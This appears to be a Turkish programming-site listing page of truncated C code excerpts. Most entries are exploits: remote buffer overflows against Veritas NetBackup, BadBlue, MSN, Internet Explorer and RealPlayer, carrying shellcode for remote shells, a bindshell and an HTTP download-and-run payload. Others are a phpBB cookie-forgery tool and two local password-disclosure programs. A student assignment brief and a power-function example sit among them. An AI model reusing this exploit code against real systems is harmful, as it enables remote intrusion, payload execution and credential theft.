163 Belge Programlama

Csit114 Term Project

Project (CSIT114). Assignment date: 06.01.2006. Submit date: 23.01.2006. The project should be submitted during the final week, both on floppy and on paper. Write a C program for a company, called stock.cpp, that uses 5 functions: creat_file() (first creates the file into which the user will insert information about stock), insert_info() (the user will input stock…

VERITAS NetBackup Remote Buffer Overflow

Targeted port: 13701
/*
DESCRIPTION
Veritas NetBackup Stack Overflow (tcp/13701)
"Volume Manager Daemon" Module

USAGE
C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
C:\NetBackup>nc 192.168.0.200 4444
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>

INFORMATION
I wrote this just for educational purposes :).
Because the buffer is very small, I had to write small shellcode.
The code is less than…

BadBlue – Remote buffer overflow

 #include <winsock2.h>#include <windows.h>#include <stdio.h>#pragma comment (lib,”ws2_32″)#define TIMEOUT 1#define VALIDSERVER “BadBlue/2.5”#define GETHEADER “HEAD HTTP/1.1 “#define HTTPSEND1 “GET /ext.dll?mfcisapicommand=”#define HTTPSEND2 “&page=index.htx HTTP/1.1 Accept: */* Accept-Language: es Accept-Encodin: gzip, deflate User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: “#define HTTPSEND3 ” Connection: Keep-Alive “#define LEN 500char shellcode[]=“xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33″“xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C”“x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE”“x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB”“xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77″“xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77″“xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77″“xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77″“xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77″“xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77″“xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77″“xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77″“xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77″“xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB” 
“x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C”“xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0″“x8Ax88xAFx87x03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77″“xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0″“xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB”“x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5″“x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98″“xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE”“x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77″“xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8″“x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF”“x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90″“x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74″“xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4″“xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94″“x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5″“xD3x4Ax8Cx88”;struct TARGETS {int num;char name[58];char offset[5];} targets[]= {// char offset[]=”x56x66x46x78″;…

phpBB2.0 Session Handler

  #include <stdio.h>#include <stdlib.h>#include <string.h>int main(int argc, char** argv[]) {FILE *pointer;char contenido[10000],cookie[91]=”a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22″,cookief[9]=”%22%3B%7D”, cookiec[106],cookie_false[92]=”a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D”,*pos;int p=0, i=0;if (argc!=2) {printf(“Usage: phpbb_exploit.exe user_id “);exit(0);}pointer=fopen(“cookies.txt”, “r”);if (pointer) {fread(contenido, 300, 10, pointer);fclose(pointer);} else {printf(“The file can’t be open “);exit(0);}strcpy(cookiec, cookie);strncat(cookiec, argv[1], 6);strcat(cookiec, cookief);if (pos=strstr(contenido, cookiec)) {p=pos – contenido;while (i<92) {if (cookie_false[i]!=NULL)contenido[p]=cookie_false[i];p++;i++;}}else {printf(“The file cookies.txt isn’t valid for execute theexploit or the…

MSN 6.2 OverFlow

  #include <stdio.h>#include <stdlib.h>#include <conio.h>#include <string.h>#ifdef __BORLANDC__#include <mem.h>#endif#define NOP 0x90char png_header[] =“x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52″“x00x00x00x40x00x00x00x40x08x03x00x00x00x9DxB7x81″“xECx00x00x01xB9x74x52x4Ex53″;char pngeof[] = “x90x90x90x59xE8x47xFExFFxFF”;/* Generic win32 http download shellcodexored with 0x1d by delikon (http://delikon.de/) */char shellcode[] = “xEB” “x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF”“xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13″“xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2″“xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90″“x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2″“xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48″“x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43″“x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96″“x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD”“xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47″“x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D”“x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33″“x78x65x78x1D”;FILE *di;int i = 0;short int weblength;char *web;char *pointer = NULL;char *newshellcode;/*xor cryptor*/char *Sifrele(char *Name1){char *Name=Name1;char xor=0x1d;int Size=strlen(Name);for(i=0;i<Size;i++)Name[i]=Name[i]^xor;return Name;}void main(int argc, char *argv[]){if (argc < 3){printf(“MSN…

Internet Explorer CSS Remote Buffer overflow

 #include <stdio.h>#include <string.h>#include <tchar.h>char bug[]=“x40x63x73x73x20x6Dx6Dx7Bx49x7Bx63x6Fx6Ex74x65x6Ex74x3Ax20x22x22x3Bx2F”“x2Ax22x20x22x2Ax2Fx7Dx7Dx40x6Dx3Bx40x65x6Ex64x3Bx20x2Fx2Ax22x7Dx7Dx20x20x20″;///////////////////////////////////////////////////////*shellcode :MessageBox (0,”hack ie6″,0,MB_OK);–XOR EBX,EBXPUSH EBX ; 0PUSH EBX ; 0ADD AL,0FPUSH EAX ; Msg ” Hack ie6 “PUSH EBX ;0JMP 746D8E72 ;USER32.MessageBoxA*/char shellcode[]= “x33xDBx53x53x04x0Fx50x53xE9xCBx8Dx6Dx74″“x90x90x48x61x63x6Bx20x69x65x36x20x63x73x73″;////////////////////////////////////////////////////////// return address :: esp+1AC :: start shellcode//MOV EAX,ESP//ADD AX,1AC//CALL EAXchar ret[]= “x8BxC4x66x05xACx01xFFxD0″;int main(int argc, char* argv[]){char buf[8192];FILE *cssfile;int i;printf(” Internet Explorer(mshtml.dll) , Cascading Style SheetsExploit “);printf(”…

RealPlayer File SMIL File Handling Remote buffer overflow

 #include <stdio.h>#include <stdlib.h>#include <string.h>char pre[]=“<smil> “” <head> “” <layout> “” <region id=”a” top=”5″ /> “” </layout> “” </head> “” <body> “” <text src=”1024_768.en.txt” region=”size” system-screen-size=””;char shellcode[]=/* bindshell port 13579 thx to metasploit.com 🙂restricted chars: 0x00, 0x90, 0xa0, 0x20, 0x0a, 0x0d, 0x3c, 0x3e,0x2f, 0x5c, 0x22, 0x58, 0x3d, 0x3b */“x29xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x8f”“x35x37x85x83xebxfcxe2xf4x73x5fxdcxcax67xccxc8x7a”“x70x55xbcxe9xabx11xbcxc0xb3xbex4bx80xf7x34xd8x0e”“xc0x2dxbcxdaxafx34xdcx66xbfx7cxbcxb1x04x34xd9xb4″ “x4fxacx9bx01x4fx41x30x44x45x38x36x47x64xc1x0cxd1″“xabx1dx42x66x04x6ax13x84x64x53xbcx89xc4xbex68x99″“x8exdex34xa9x04xbcx5bxa1x93x54xf4xb4x4fx51xbcxc5″“xbfxbex77x89x04x45x2bx28x04x75x3fxdbxe7xbbx79x8b”“x63x65xc8x53xbexeex51xd6xe9x5dx04xb7xe7x42x44xb7″“xd0x61xc8x55xe7xfexdax79xb4x65xc8x53xd0xbcxd2xe3″“x0exd8x3fx87xdax5fx35x7ax5fx5dxeex8cx7ax98x60x7a”“x59x66x64xd6xdcx66x74xd6xccx66xc8x55xe9x5dx02x8e”“xe9x66xbex64x1ax5dx93x9fxffxf2x60x7ax59x5fx27xd4″“xdaxcaxe7xedx2bx98x19x6cxd8xcaxe1xd6xdaxcaxe7xed”“x6ax7cxb1xccxd8xcaxe1xd5xdbx61x62x7ax5fxa6x5fx62″“xf6xf3x4exd2x70xe3x62x7ax5fx53x5dxe1xe9x5dx54xe8″“x06xd0x5dxd5xd6x1cxfbx0cx68x5fx73x0cx6dx04xf7x76″“x25xcbx75xa8x71x77x1bx16x02x4fx0fx2ex24x9ex5fxf7″“x71x86x21x7axfax71xc8x53xd4x62x65xd4xdex64x5dx84″“xdex64x62xd4x70xe5x5fx28x56x30xf9xd6x70xe3x5dx7a”“x70x02xc8x55x04x62xcbx06x4bx51xc8x53xddxcaxe7xed”“xf1xedxd5xf6xdcxcaxe1x7ax5fx35x37x85″;char end[]=” </body>”“</smil>”;char overflow[1700];int main(int argc,char *argv[]){FILE…

Manuel pow Fonksiyonu CPP

Bildiğimiz gibi C'de kuvvet alan bir math.h kütüphanesi fonksiyonu bulunmaktadır; hatta ismi de pow()'dur. Ancak bu fonksiyon için illa math.h'a ihtiyacımız yok; kendimiz gayet rahat bir şekilde tanımlayabiliriz. Nasıl mı? İşte kodlar aşağıda:
#include <stdio.h>int integerPower(int,int);void main(){int base,exponent;printf(“enter the base : “);scanf(“%d”,&base);printf(” enter the exponent :”);scanf(“%d”,&exponent);printf(“%d to the power %d…

iPool Telnet Password Disclosure

 #include <stdio.h>#include <string.h>#include <windows.h>HKEY hKey;#define BUFSIZE 100char prgfiles[BUFSIZE];DWORD dwBufLen=BUFSIZE;LONG lRet;int main(){if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,“SOFTWAREMicrosoftWindowsCurrentVersion”,0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS){lRet = RegQueryValueEx( hKey, “ProgramFilesDir”, NULL,NULL,(LPBYTE) prgfiles, &dwBufLen);if( (lRet != ERROR_SUCCESS) || (dwBufLen >BUFSIZE) ){RegCloseKey(hKey);printf(“An error occured. Can’t getpassword! “);return -1;}RegCloseKey(hKey);}else{printf(“An error occured. Can’t get password! “); return -1;}printf(” iPool 1.6.81 Local Password Disclosure Exploit byKozan “);printf(“Credits to ATmaCA “);printf(“kozan@netmagister.com “);printf(“www.netmagister.com – www.spyinstructors.com…

Snooker 1.68 password disclosure

 #include <stdio.h>#include <string.h>#include <windows.h>HKEY hKey;#define BUFSIZE 100char prgfiles[BUFSIZE];DWORD dwBufLen=BUFSIZE;LONG lRet;int main(){if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,“SOFTWAREMicrosoftWindowsCurrentVersion”,0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS){lRet = RegQueryValueEx( hKey, “ProgramFilesDir”, NULL,NULL,(LPBYTE) prgfiles, &dwBufLen);if( (lRet != ERROR_SUCCESS) || (dwBufLen >BUFSIZE) ){RegCloseKey(hKey);printf(“An error occured. Can’t getpassword! “);return -1;}RegCloseKey(hKey);}else{printf(“An error occured. Can’t get password! “);return -1;}char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];strcpy(pwdfile,strcat(prgfiles,”TheSnookerClubiSnookerMyDetails.txt”));int addr, i, y;FILE *fp;char ch[100], ch2[100];if((fp=fopen(pwdfile,”rb”)) == NULL){printf(“An error occured. Can’t get…